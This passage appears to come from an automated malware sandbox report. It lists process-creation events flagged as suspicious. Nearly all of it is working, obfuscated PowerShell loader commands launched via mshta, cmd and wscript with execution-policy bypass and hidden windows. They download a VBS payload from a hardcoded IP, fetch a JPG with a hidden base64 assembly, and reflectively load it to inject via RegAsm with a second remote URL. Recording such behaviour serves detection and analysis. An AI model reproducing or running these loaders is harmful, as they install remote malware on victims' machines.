TsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"	Jump to behavior

Suspicious command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)\| invoke-expresSIon"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = 